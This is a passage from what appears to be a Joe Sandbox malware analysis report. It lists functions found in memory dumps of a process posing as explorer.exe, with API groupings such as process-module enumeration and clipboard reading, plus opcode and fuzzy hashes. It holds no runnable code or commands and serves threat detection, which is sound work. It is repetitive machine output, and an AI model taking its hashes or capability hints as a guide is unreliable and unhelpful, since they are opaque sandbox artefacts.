                                                                                                                                                                                                                                                    Function 10D8A080 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2998201375-0
                                                                                                                                                                                                                                                    • Opcode ID: 170680c62c6453ed16497621bbe96b4bc081c3f020d5efca303892a641436c92
                                                                                                                                                                                                                                                    • Instruction ID: 1e6802179326bac5e6d1e5263c19ad24c1143d52d00968ed444a08bb994c4713
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 170680c62c6453ed16497621bbe96b4bc081c3f020d5efca303892a641436c92
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5131E6322147C087E7508F29E58476DBBA5FB84FD4F198227EB8957B69CB38C842CB01
                                                                                                                                                                                                                                                    Function 0F4CA080 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2998201375-0
                                                                                                                                                                                                                                                    • Opcode ID: 170680c62c6453ed16497621bbe96b4bc081c3f020d5efca303892a641436c92
                                                                                                                                                                                                                                                    • Instruction ID: a818e56c0f17e60074c5ef5f0a442f3d651929d13047eb0ce22df066ded4205f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 170680c62c6453ed16497621bbe96b4bc081c3f020d5efca303892a641436c92
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3931183A20478486D7A08F26E59076ABBA1F784FC4F18A22BEF8957B56CF3CD441C740
                                                                                                                                                                                                                                                    Function 0E91A080 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2998201375-0
                                                                                                                                                                                                                                                    • Opcode ID: 170680c62c6453ed16497621bbe96b4bc081c3f020d5efca303892a641436c92
                                                                                                                                                                                                                                                    • Instruction ID: a41be4a2c5ff1de6583f50c2c6e2b10556d02335cff2266d2a845784c189856c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 170680c62c6453ed16497621bbe96b4bc081c3f020d5efca303892a641436c92
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B53103762167848ADB208F15E590729BBB9FB85FC4F188566EB8957B68CB78CC41CF00
                                                                                                                                                                                                                                                    Function 10D75970 Relevance: 7.6, APIs: 5, Instructions: 57processCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Module32$Next$CreateCurrentFirstProcessSnapshotToolhelp32
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3721439000-0
                                                                                                                                                                                                                                                    • Opcode ID: 3306ccaa1009024e6a2aa2c44b23220bb007f1bc9590cfaa9dfbcbbbd3f16bd9
                                                                                                                                                                                                                                                    • Instruction ID: 046cb4a52643e9ef490856a7c4b6acb61db874b2bc2d996938d2f997eee4126c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3306ccaa1009024e6a2aa2c44b23220bb007f1bc9590cfaa9dfbcbbbd3f16bd9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7811D5262146C442DA10DB25E49135AB366F7C83E8FD0C321EA9D477D8EF7CD508CB11
                                                                                                                                                                                                                                                    Function 0F4B5970 Relevance: 7.6, APIs: 5, Instructions: 57processCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Module32$Next$CreateCurrentFirstProcessSnapshotToolhelp32
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3721439000-0
                                                                                                                                                                                                                                                    • Opcode ID: 3306ccaa1009024e6a2aa2c44b23220bb007f1bc9590cfaa9dfbcbbbd3f16bd9
                                                                                                                                                                                                                                                    • Instruction ID: a781aafc83afc297859a59f27a7dad6cf8793dcba99e28cbd6d9a6d4be78636e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3306ccaa1009024e6a2aa2c44b23220bb007f1bc9590cfaa9dfbcbbbd3f16bd9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B411872231878052DE20DB16E4903EAA366FBC9794FC4421ADF5D4779ADF3CC5058720
                                                                                                                                                                                                                                                    Function 0E905970 Relevance: 7.6, APIs: 5, Instructions: 57processCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Module32$Next$CreateCurrentFirstProcessSnapshotToolhelp32
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3721439000-0
                                                                                                                                                                                                                                                    • Opcode ID: 3306ccaa1009024e6a2aa2c44b23220bb007f1bc9590cfaa9dfbcbbbd3f16bd9
                                                                                                                                                                                                                                                    • Instruction ID: 2a939e78032920f71567a7070f8c69b671b50bab926a8552bcd6c0a14d43ac14
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3306ccaa1009024e6a2aa2c44b23220bb007f1bc9590cfaa9dfbcbbbd3f16bd9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4411A8223147845ADB20E715E59436AA3AAF7C57A4FD04611DA5D47BD8EF3CC908CF00
                                                                                                                                                                                                                                                    Function 10D78390 Relevance: 7.5, APIs: 5, Instructions: 42clipboardCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1006321803-0
                                                                                                                                                                                                                                                    • Opcode ID: 681bfd7b9a529a093bc5f4f9ee533b49214d0e473a73f73fce6e6f8c86b06430
                                                                                                                                                                                                                                                    • Instruction ID: 91b65a4e89cc29c8ba1d6ec1579aa3990671b37293faff1b64bfd9ca720a792a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 681bfd7b9a529a093bc5f4f9ee533b49214d0e473a73f73fce6e6f8c86b06430
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D018F36704B8183EE488F56F94536A6321EB88FC4F489034EE9B47758DF7CD4828700
                                                                                                                                                                                                                                                    Function 0F4B8390 Relevance: 7.5, APIs: 5, Instructions: 42clipboardCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1006321803-0
                                                                                                                                                                                                                                                    • Opcode ID: 681bfd7b9a529a093bc5f4f9ee533b49214d0e473a73f73fce6e6f8c86b06430
                                                                                                                                                                                                                                                    • Instruction ID: 1a84cf812d9dab348c09528dcaf6aa59432c47d9383c9d495075de4b00d6d059
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 681bfd7b9a529a093bc5f4f9ee533b49214d0e473a73f73fce6e6f8c86b06430
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80017121709B4242EE589B16B9443AB6325BB88FC0F485039DE6A07B5AEF7CD0969700
                                                                                                                                                                                                                                                    Function 10D7C7F4 Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 10D7C801
                                                                                                                                                                                                                                                      • Part of subcall function 10D80FAC: _getptd_noexit.LIBCMT ref: 10D80FB2
                                                                                                                                                                                                                                                      • Part of subcall function 10D80FAC: _amsg_exit.LIBCMT ref: 10D80FC2
                                                                                                                                                                                                                                                    • _inconsistency.LIBCMT ref: 10D7C80F
                                                                                                                                                                                                                                                      • Part of subcall function 10D837B0: DecodePointer.KERNEL32 ref: 10D837BB
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 10D7C814
                                                                                                                                                                                                                                                    • _inconsistency.LIBCMT ref: 10D7C830
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 10D7C840
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3669027769-0
                                                                                                                                                                                                                                                    • Opcode ID: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                                                    • Instruction ID: 0ec35d8643f7bd9d1d2cba008192ab03f5cb8479e08493312b56031938644045
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99E06576610584C9CA515F51E0411AD6760EBCCBC8F0DE13AFB841B345DF20D89083A2
                                                                                                                                                                                                                                                    Function 0F4BC7F4 Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0F4BC801
                                                                                                                                                                                                                                                      • Part of subcall function 0F4C0FAC: _getptd_noexit.LIBCMT ref: 0F4C0FB2
                                                                                                                                                                                                                                                      • Part of subcall function 0F4C0FAC: _amsg_exit.LIBCMT ref: 0F4C0FC2
                                                                                                                                                                                                                                                    • _inconsistency.LIBCMT ref: 0F4BC80F
                                                                                                                                                                                                                                                      • Part of subcall function 0F4C37B0: DecodePointer.KERNEL32 ref: 0F4C37BB
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0F4BC814
                                                                                                                                                                                                                                                    • _inconsistency.LIBCMT ref: 0F4BC830
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0F4BC840
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3669027769-0
                                                                                                                                                                                                                                                    • Opcode ID: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                                                    • Instruction ID: 05393cf1ef5fd687d028950d6bf8968e8a4d2407d3726328b4ada58932b5ef02
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62E01526615680C1CA916B6AE0C41FA7361AB8CB85F0CA17F9F840B307EF68C4A083E4
                                                                                                                                                                                                                                                    Function 0C36BBF4 Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0C36BC01
                                                                                                                                                                                                                                                      • Part of subcall function 0C3703AC: _getptd_noexit.LIBCMT ref: 0C3703B2
                                                                                                                                                                                                                                                      • Part of subcall function 0C3703AC: _amsg_exit.LIBCMT ref: 0C3703C2
                                                                                                                                                                                                                                                    • _inconsistency.LIBCMT ref: 0C36BC0F
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0C36BC14
                                                                                                                                                                                                                                                    • _inconsistency.LIBCMT ref: 0C36BC30
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0C36BC40
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _getptd$_inconsistency$_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 823043651-0
                                                                                                                                                                                                                                                    • Opcode ID: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                                                    • Instruction ID: 4e93977e06043c23eea95690eb7ba5e582bdb2e08119ac33121379de3b79cc6e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66E03022331585C2DA257F51E0C01FDA368FB88B8CF0CC675AB895BB09DE24C5949FA6
                                                                                                                                                                                                                                                    Function 0E90C7F4 Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0E90C801
                                                                                                                                                                                                                                                      • Part of subcall function 0E910FAC: _getptd_noexit.LIBCMT ref: 0E910FB2
                                                                                                                                                                                                                                                      • Part of subcall function 0E910FAC: _amsg_exit.LIBCMT ref: 0E910FC2
                                                                                                                                                                                                                                                    • _inconsistency.LIBCMT ref: 0E90C80F
                                                                                                                                                                                                                                                      • Part of subcall function 0E9137B0: DecodePointer.KERNEL32 ref: 0E9137BB
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0E90C814
                                                                                                                                                                                                                                                    • _inconsistency.LIBCMT ref: 0E90C830
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0E90C840
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3669027769-0
                                                                                                                                                                                                                                                    • Opcode ID: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                                                    • Instruction ID: 46ae621bfa046231d6a35229e74ce61c2f9bba29b7d81165c163e62fb9036379
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DCE03022611688C9CA11EB51E0412EEA3A4EBCCB80F4E8A719F840B349DF20CCD08B98
                                                                                                                                                                                                                                                    Function 0A03BBF4 Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0A03BC01
                                                                                                                                                                                                                                                      • Part of subcall function 0A0403AC: _getptd_noexit.LIBCMT ref: 0A0403B2
                                                                                                                                                                                                                                                      • Part of subcall function 0A0403AC: _amsg_exit.LIBCMT ref: 0A0403C2
                                                                                                                                                                                                                                                    • _inconsistency.LIBCMT ref: 0A03BC0F
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0A03BC14
                                                                                                                                                                                                                                                    • _inconsistency.LIBCMT ref: 0A03BC30
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0A03BC40
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, Offset: 0A020000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_a020000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _getptd$_inconsistency$_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 823043651-0
                                                                                                                                                                                                                                                    • Opcode ID: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                                                    • Instruction ID: 49c90099eb3ba3c6ad69714f560e0628f0d8cfb8149d519991eb252671e908b5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32E01C6373098C91CA71AF51E0401FD76A8BB89F88F0D8875DB841B606DE24C4908B95
                                                                                                                                                                                                                                                    Function 0E8BBBF4 Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0E8BBC01
                                                                                                                                                                                                                                                      • Part of subcall function 0E8C03AC: _getptd_noexit.LIBCMT ref: 0E8C03B2
                                                                                                                                                                                                                                                      • Part of subcall function 0E8C03AC: _amsg_exit.LIBCMT ref: 0E8C03C2
                                                                                                                                                                                                                                                    • _inconsistency.LIBCMT ref: 0E8BBC0F
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0E8BBC14
                                                                                                                                                                                                                                                    • _inconsistency.LIBCMT ref: 0E8BBC30
                                                                                                                                                                                                                                                    • _getptd.LIBCMT ref: 0E8BBC40
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Offset: 0E8A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _getptd$_inconsistency$_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 823043651-0
                                                                                                                                                                                                                                                    • Opcode ID: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                                                    • Instruction ID: 18cc1eb64cf4a8825ff4f1bf0fad301590dca1895a72279015161e07b8f1f711
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FFE06522225984C2CA11BFA6E0601FD63A4EB89FC4F0C88798B848B355DE30CC908356
                                                                                                                                                                                                                                                    Function 0C35DA40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • tch against a regular expression exceeded a pre-set level., xrefs: 0C35DB64
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: isprint$strstr
                                                                                                                                                                                                                                                    • String ID: tch against a regular expression exceeded a pre-set level.
                                                                                                                                                                                                                                                    • API String ID: 1066184663-3082203224
                                                                                                                                                                                                                                                    • Opcode ID: ce1d374ef6b9b1942780a81c10b6dbdcb3e962423b1347e4a7050d8422866340
                                                                                                                                                                                                                                                    • Instruction ID: 812f4a4f9f742f25e3756eea02eefe34ace5a965ca300618d37567a3d0be3f52
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce1d374ef6b9b1942780a81c10b6dbdcb3e962423b1347e4a7050d8422866340
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1241E337728B8885DB248F11F6807AA77A5F785B54F844225DE9A03768EB7CC189CB00
                                                                                                                                                                                                                                                    Function 0A02DA40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • tch against a regular expression exceeded a pre-set level., xrefs: 0A02DB64
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, Offset: 0A020000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_a020000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: isprint$strstr
                                                                                                                                                                                                                                                    • String ID: tch against a regular expression exceeded a pre-set level.
                                                                                                                                                                                                                                                    • API String ID: 1066184663-3082203224
                                                                                                                                                                                                                                                    • Opcode ID: ce1d374ef6b9b1942780a81c10b6dbdcb3e962423b1347e4a7050d8422866340
                                                                                                                                                                                                                                                    • Instruction ID: 35a6f1651963ed6549719cbd25f21fb5c402d6fc2d226b9432086a1792ad3159
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce1d374ef6b9b1942780a81c10b6dbdcb3e962423b1347e4a7050d8422866340
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A41F333708BA885EBA18F21F4903BBB7E4F789754F844226DE8A43759EB78C545CB00
                                                                                                                                                                                                                                                    Function 0E8ADA40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • tch against a regular expression exceeded a pre-set level., xrefs: 0E8ADB64
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Offset: 0E8A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: isprint$strstr
                                                                                                                                                                                                                                                    • String ID: tch against a regular expression exceeded a pre-set level.
                                                                                                                                                                                                                                                    • API String ID: 1066184663-3082203224
                                                                                                                                                                                                                                                    • Opcode ID: ce1d374ef6b9b1942780a81c10b6dbdcb3e962423b1347e4a7050d8422866340
                                                                                                                                                                                                                                                    • Instruction ID: 6501940bb169a22c3035dd7f3705dcfbc735b315e6c3bf34323a152a5dbb304f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce1d374ef6b9b1942780a81c10b6dbdcb3e962423b1347e4a7050d8422866340
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3541D523208B9485EB208F15F5903AAB7E5F789758F884625DF9EC3BD8EB78C546C700
                                                                                                                                                                                                                                                    Function 10D8DC4A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 10D7C7F4: _getptd.LIBCMT ref: 10D7C801
